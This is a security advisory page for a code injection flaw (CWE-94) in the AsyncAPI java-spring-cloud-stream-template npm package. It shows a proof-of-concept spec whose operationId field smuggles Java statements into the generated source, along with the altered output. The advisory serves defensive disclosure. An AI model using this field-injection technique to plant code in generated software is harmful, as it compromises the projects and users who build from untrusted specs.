GHSA-xj6r-2jpm-qvxp

Suggest an improvement
Source
https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-xj6r-2jpm-qvxp/GHSA-xj6r-2jpm-qvxp.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-xj6r-2jpm-qvxp
Aliases
Related
Published
2021-08-25T14:45:52Z
Modified
2023-11-01T04:55:54.738884Z
Severity
  • 8.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N CVSS Calculator
Summary
Code injection issue for java-spring-cloud-stream-template
Details

The following was initially reported by @jonaslagoni:

Given the following command: ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": { 
              "type": "string"
          }
        }
      }
    }
  }
}

Which changes the following output: 

...
  @Bean
  public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
  }
...

To

...
  @Bean
  public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
  public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
  }
...
Database specific 
{
    "nvd_published_at": "2021-08-11T18:15:00Z",
    "github_reviewed_at": "2021-08-24T18:50:59Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}
References

Affected packages

npm / @asyncapi/java-spring-cloud-stream-template

Package

Name
@asyncapi/java-spring-cloud-stream-template
View open source insights on deps.dev
Purl
pkg:npm/%40asyncapi/java-spring-cloud-stream-template

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.7.0

Database specific 

{
    "last_known_affected_version_range": "<= 0.6.9"
}